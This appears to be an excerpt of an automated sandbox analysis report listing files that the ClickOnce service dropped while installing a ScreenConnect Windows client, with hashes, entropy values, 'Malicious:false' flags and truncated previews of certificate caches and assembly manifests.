                                                                                                                  SHA1:340F3E41F54D3B7F4B87406A8E45DCD742BB0470
                                                                                                                  SHA-256:AE6CD6930B1C105057B98AE462B79F05EA33994C59B23F4536DFDFD16DD279C8
                                                                                                                  SHA-512:E1C98A9D25441179C34E6825847F609981C1EE283A003B5EC2ACD6894EB3348CB59C29899514DCADBD17EFED5285721E6E07FB7FB1BEB9361728886067260593
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="22631" />.. <arg nm="vercsdbld" val="4169" />.. <arg nm="verqfe" val="4169" />.. <arg nm="csdbld" val="4169" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="178427" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.1.22621.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096"

                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:Certificate, Version=3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1716
                                                                                                                  Entropy (8bit):7.596259519827648
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                  MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                  SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                  SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                  SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                  Malicious:false
                                                                                                                  Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/

                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):727
                                                                                                                  Entropy (8bit):7.604392790665388
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:5onfZfk5RlRtBfQK0SDflgLbWuNqtvzfpwKShjDtUt/mZwR3iFLz5d7keBun:5iBkdZiCqLb7qlqZntUt/mGSFn5qeu
                                                                                                                  MD5:AAD13A044F871848379BAC65D25BEE2B
                                                                                                                  SHA1:589A79AB06D643B05BF0DF781CC8900287E4BE12
                                                                                                                  SHA-256:54143C0EE8CBAE61776A62BF6E76AAC4E986BFD42D8235BAA088C94552B5D64F
                                                                                                                  SHA-512:0001F86EE15780F2F30ED045A85540769F552D269BED38C1779FC775FEB56E82E2ACA4D38D307B87B218897E90E258F2FAFC487DDD5D667B0D37B4F404540173
                                                                                                                  Malicious:false
                                                                                                                  Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20250410181403Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20250410181403Z....20250417181403Z0...*.H.............'.)p.t...@n.}.h..T..3.@...kkA'...gh.~$..Ii(...5dR..D...F..x.t...vV.4.......a`...M...f......(.cqL.*f?Y...p...........3.#....O/.........h.)./T.*.A..D~....Oh"..A-.Jj.....p-.Y...m.......'.@.m....e...N..Q.lV.7..[..${*%.....9.=.n..DH...d......=|..H .=..P0.{3.pk.}..9f6r.....U.......\J.j...K.Z..&...Nt.&-..3..U.2.).......&. ........z....Y..o.@>'~l../(:....%c.].=.._.~..!./ZS.w.dy.p/....D..zgR...=..`2M......L..h .....M..r...V.$!.L.....G6...i/.HT..u........).s.`..M.~...#$...T3.F.h.p.D..g...

                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):340
                                                                                                                  Entropy (8bit):3.445355816203448
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:kKxR3/K87RMiG7DYUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:5R3CETLkPlE99SCQl2DUeXJlOA
                                                                                                                  MD5:EEACC8DBECC68FF60E672C44314F71D0
                                                                                                                  SHA1:838BC956067DD8CC4FDF772AAE733A5A04F10389
                                                                                                                  SHA-256:15B672666C74D1D474B27F162E7607B316578A7831CD8B9FCEAA102DFC115D3E
                                                                                                                  SHA-512:85D630474AF4E3FC52E7906AA27A472BB73CB509A54EFE25E75EECEC7ABA2221DBACAB870B0D671361011E26B5713DBF901D30769B7ED166A8CE03E0D70CF905
                                                                                                                  Malicious:false
                                                                                                                  Preview:p...... ........5......(..................................................... ........~..MG......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...

                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):308
                                                                                                                  Entropy (8bit):3.2442081548436446
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:kKYZamJHcalgRAOAUSW0P3PeXJUwh8lmi3Y:MaptWOxSW0P3PeXJUZY
                                                                                                                  MD5:15F382FB515CF9D863079B35003FAE49
                                                                                                                  SHA1:EE659B189C1E04AC0E1449553AC391B23514A8DD
                                                                                                                  SHA-256:4AA28D0D9C66E11653D0416E8F19D010087C1D5162B9ABF4C834A5548254A45B
                                                                                                                  SHA-512:A3601FD8624D405C8FE51B518BF507899D82C441B37D991188107323440725CE90C880B66EE3B75BEFA750ED15F7107F02CA10844C113110F2A0D830DDE39323
                                                                                                                  Malicious:false
                                                                                                                  Preview:p...... ................(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):412
                                                                                                                  Entropy (8bit):3.877987710320846
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:F2iac/ImxMiv8sFBSfamB3rbFURMOlAkr:ylmxxv7Sf13rbQJr
                                                                                                                  MD5:E7B0EB980A2B3DB7AC921C73A9F37401
                                                                                                                  SHA1:B8610EACC2074D894B9523CB11D0B43C96A3CBA6
                                                                                                                  SHA-256:D69951A8F39FD7F06FE3AC462609E16E1AD543DFCD294A03823F82954108A82B
                                                                                                                  SHA-512:37CECD76F80BB8D5F4E1A3C88F08F8CCA27A53DF53BE9A12B504ED258BDF2FD7358910C85AC00F1C384FD022232CD052FBF9496BB008A11F54EB0255206D7144
                                                                                                                  Malicious:false
                                                                                                                  Preview:p...... ....(...<.#z....(................g.VD................................. ...................................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\manifests\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d.cdf-ms

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25496
                                                                                                                  Entropy (8bit):5.070826523606942
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:5+qH/3G66QV1X9w2oX9R/QPIBM7YF+++amtD:57V6QV1X9wpX9R/QPI+0F+++amtD
                                                                                                                  MD5:637E2A32B238101CA40525B9AD132511
                                                                                                                  SHA1:2F71ED1F62B9345F18F148A017A368F7494D7178
                                                                                                                  SHA-256:73B0F8991E20347ED794CDAF30F4E8EDD2BD78CAE97A3AC4E9043D38896E302E
                                                                                                                  SHA-512:11B46BF5E225C8D58590AA0BA89F1D08AF0744B4AD6C23E2D18B4F17A96539CF6F8067445DBD2ED4DCC147AC0A4F448F1DF68A73EC9436A3BBA0ED8C27E69A21
                                                                                                                  Malicious:false
                                                                                                                  Preview:PcmH........].-..+.-f.......!...T...........................e...?....<.g..J.|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$............M.^z.......S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K...[s.T..<N....u..IV..Q......D..R...O.&r..VzU.....E..X.X......3LD.S\...........`.......=...O...S...V...Y...].......,.......L.......T.......\.......`.......|...........................................@.......0...........<.......T.......h.......|...0.......................................0...........<.......T.......h.......|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\manifests\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d.manifest

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):17858
                                                                                                                  Entropy (8bit):5.956106251442279
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:NeE6JrTpGaaXhf6DVuX9IW21X9FX9R/QPIYM7Y7:Nf6DVuX9IWIX9FX9R/QPIN07
                                                                                                                  MD5:59009C4F246E6528BA70C6F65EE5DD0C
                                                                                                                  SHA1:2DD1D0898E3E098DF45854CCBE5DF617DCC122F8
                                                                                                                  SHA-256:E272B0496A6350E84FC34140476F9EF1BF51612ABCBF6014C3CA07E0ABE12EA1
                                                                                                                  SHA-512:898C97567B23FD391508B5C3DACA1BB13E599FAE97FFE262B6EC857070EE1C1A36691CC89F2A66D2C310D50D56FB21A483D3220A25F288F2EBB55E7A1A4F8F07
                                                                                                                  Malicious:false
                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.4.4.9118" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.4.4.9118" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\manifests\scre..core_4b14c015c87c1ad8_0018.0004_none_53a10f2bfd9f6d01.cdf-ms

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3452
                                                                                                                  Entropy (8bit):4.106587747003808
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:D4IE83eF7lMDWWOLg4e6S+9owQX7gG7mL6DO2V42WGsJfLJ7hIYX:UKhWWSeV+WwQXTmL6DOr2WGsJzZhIYX
                                                                                                                  MD5:BD7E274967B2D34DDF98525C25D9BB70
                                                                                                                  SHA1:70E15EAE0EA219B53BA637B33840B6DD0DBF2B43
                                                                                                                  SHA-256:8ED27132AEF3E096839B021D788C44C8ED980315A4AAB804475957F0C24AE901
                                                                                                                  SHA-512:73F6C70A5470360E988053BC038A9E4329B1648AC46AB072768FA2C9809578C3B0DFA409B06AFC28A8CA4DC3C5AA8D61538FFBD994984E09B331117628E4F0E1
                                                                                                                  Malicious:false
                                                                                                                  Preview:PcmH.........2Z..y.#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$............M.^z.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...................................................................................................................................................................................................nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.4.4.9118%....................................................MdHd............D...........MdSp(...$...&...(...#............... urn:schemas

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\manifests\scre..core_4b14c015c87c1ad8_0018.0004_none_53a10f2bfd9f6d01.manifest

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1215
                                                                                                                  Entropy (8bit):5.130185100833224
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:JdFYZ8h9onR+geP0AOvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AyGVETDTo
                                                                                                                  MD5:C1725D95495640E20CCBB09A196AC383
                                                                                                                  SHA1:9A37BC510C15C6810A9DFF641783ECA704172263
                                                                                                                  SHA-256:C0083D1E414DD476B5DC61382A5B0DF2048ED14845C5F235008A106F80828E5D
                                                                                                                  SHA-512:71D37886EB6FE7D0E9DC430A816ED53F962A21CD26189CF98CF48A5CA90EC415C72CA80649EDFEAA0556D9935EE82829425E9CAA4968F8C3EA370BC504C7ECF3
                                                                                                                  Malicious:false
                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.4.9118" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\manifests\scre..dows_4b14c015c87c1ad8_0018.0004_none_5818e70d39ed8031.cdf-ms

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5256
                                                                                                                  Entropy (8bit):4.861699365666775
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:JP+9qcl4dheV+Ww7EkLn5Dl4M7Y8OXgKPHjwnMqGo:JWrl4UJy75R/0fnc3z
                                                                                                                  MD5:B475F91A30AF30490D876AE6618B118D
                                                                                                                  SHA1:F4CABB063A73CC7AA7D12094EF70D296ADFE751C
                                                                                                                  SHA-256:26698471472092B4A3B1C7C1CD4A283352A53F3788649A93F160FEAC6A1C4422
                                                                                                                  SHA-512:E6A4613B50440F0BF28D8D17F78C5A79939A4A73D7C29818A73D66DF823CAFAC505E7995070325E7679AD7EEE0ECA14329BED7CCC8C99CE173D233A975FBE839
                                                                                                                  Malicious:false
                                                                                                                  Preview:PcmH........q...2...4...t.......T...............P...........3........<.g..J.|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$............M.^z.....[.......................z..w.....[~31.X....C.........y..&..d......B(.........^.ie...u"...F.....Ey%....+.`...m(.....E..X.+...s".I...R,......;../............... ...#...&...)...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........h...@.......................................(...................$...(...8.......`.......h.......x...(.......................(.......................(...........4.......<...(...L.......t.......|...........(.......................(...............d...........l.......................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\manifests\scre..dows_4b14c015c87c1ad8_0018.0004_none_5818e70d39ed8031.manifest

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1980
                                                                                                                  Entropy (8bit):5.056932816447632
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:JdFYZ8h9onRbggeP0AMvSkcyMkcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AgHMkGQAXRTFgTo
                                                                                                                  MD5:58503CF055B0CCE20796B9F1C98BEF88
                                                                                                                  SHA1:08608C9962C02380E78B8CEB0882FD12CC85AFDF
                                                                                                                  SHA-256:13D2921CC2CCC0DA6EAB2EFA06E7C9A4DEAE079169EB1B198D61838AB7AE61E7
                                                                                                                  SHA-512:1BF0515D9618E84C3BE8E935605F3BEF835732C3B89BEF973F160C73B990CB1E6D93CC2D547E89E986FD0F7B28CDE2EBA0B830830DEA3F067242D723C84CA84E
                                                                                                                  Malicious:false
                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.4.9118" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.4.9118" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\manifests\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e.cdf-ms

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6584
                                                                                                                  Entropy (8bit):3.9977722493007484
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:qXw24PPvdDmeV+Wwwe8WpJOwpvND98vPqtFevNLjyyzJJvG1dv+FqoVjz:0wdPPvdFJSpJBFu3YFeVJJYdgTz
                                                                                                                  MD5:95B70FD6C35FCD47132DE64D29E2275C
                                                                                                                  SHA1:AF8AB041AC6914108D866923BDD9CA44EE20DB73
                                                                                                                  SHA-256:5EE544520D2DC092D6C4E2EF8D3B0396A57DE61096AF9C7257773F9FE94DEA63
                                                                                                                  SHA-512:DDAF59B5BD32809DDE1AA42B091882D20947D6D7874C564E187A366A8E462E93BE66EBC4DD7B3A3C3BAE2A66CC855727ABCE92317E6079B5EAFA7C401B7AEC23
                                                                                                                  Malicious:false
                                                                                                                  Preview:PcmH..........4.=z..@...........T...............t...........?........<.g..J.|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$............M.^z.........}'.d................z..w.....[~31.X....O.&r..Vz....s".I...R....y..&..d."....B(.....#...C.....&...[s.T..<)...^.ie...u,...F.....Ey/...f..VC..2.....E..X.5......;..8.....V....X;........... ...$...'...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...T...........@...................................,...(...4.......\.......d.......|...(...............................(.......................(... .......H.......P...(...d...................(.......................(.......................(...$.......L.......T...(...h...................(.......................(...................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\manifests\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e.manifest

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2569
                                                                                                                  Entropy (8bit):5.024000338224721
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:3FYZ8h9o5gI0A/HMkAXQ3MkTMkRGTDBTo:1YiW4AUlvpM
                                                                                                                  MD5:EF19EB1F6867FB2EAC046091B1343338
                                                                                                                  SHA1:7C830489E94A67FB5F17E78D364A92B22C3600F7
                                                                                                                  SHA-256:89132764325B05F53BC198F7A5474932AE1CC6BB637821840A45297AA63A8CFB
                                                                                                                  SHA-512:4C299B71BDF5FDE04A2DFCECB7F8428D6C8535C04C78D975EDCC91CFA7DE95B0AB16F110F44F53DBB30B008B9B0B31FC30BB607AA068CF237EFE5C342CAD6695
                                                                                                                  Malicious:false
                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.4.9118" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.4.9118" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\manifests\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9b66cfe0ceec305.cdf-ms

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3032
                                                                                                                  Entropy (8bit):4.718575127437687
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:a5AxkQ/c8gOe6S+9oww7gI7jtoVXeAnxW6xe1YeCxn+1tnwbK:QA5/cWeV+WwwljtoVBxhxwYeCN+3nEK
                                                                                                                  MD5:01435E36AB46BD768DA29728129A244E
                                                                                                                  SHA1:02650FF151B6F5C11F9B12401C2C751112496AEF
                                                                                                                  SHA-256:489900D7CCC376388EAA0F12AF470E7E33D26116A485B429801278C25569977F
                                                                                                                  SHA-512:8C7CAA938B237E56403C56669DFA002182888EAA2D04C480E7F5CDFDAF19C18F203FE54037CCA3FD52EC558FCB7DFBF6F31F9BAC216C1AA209737EDEBF7451E2
                                                                                                                  Malicious:false
                                                                                                                  Preview:PcmH.............L.............T....................................<.g..J.|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$............M.^z.......S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...............................................................................................................................................................nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.4.4.9118%....................................................MdHd............<...........MdSp ...$....... ...".............n: urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)

                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\manifests\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9b66cfe0ceec305.manifest

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1039
                                                                                                                  Entropy (8bit):5.143873637965305
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0A4cR7vNxW57FpS+iENg49vNxW5NgM4HNg49vNx:JdFYZ8h9onRigeP0AOvSkcyMkcVSkTo
                                                                                                                  MD5:9352EE4250503E5C30608C0A93401FB3
                                                                                                                  SHA1:1089226EFE4E5FDDDD76364542ED4198D37C5C11
                                                                                                                  SHA-256:EC8825166E99A8A53E505EFAC5D683714BA4CA8EE90567C18B5A85A87FED235E
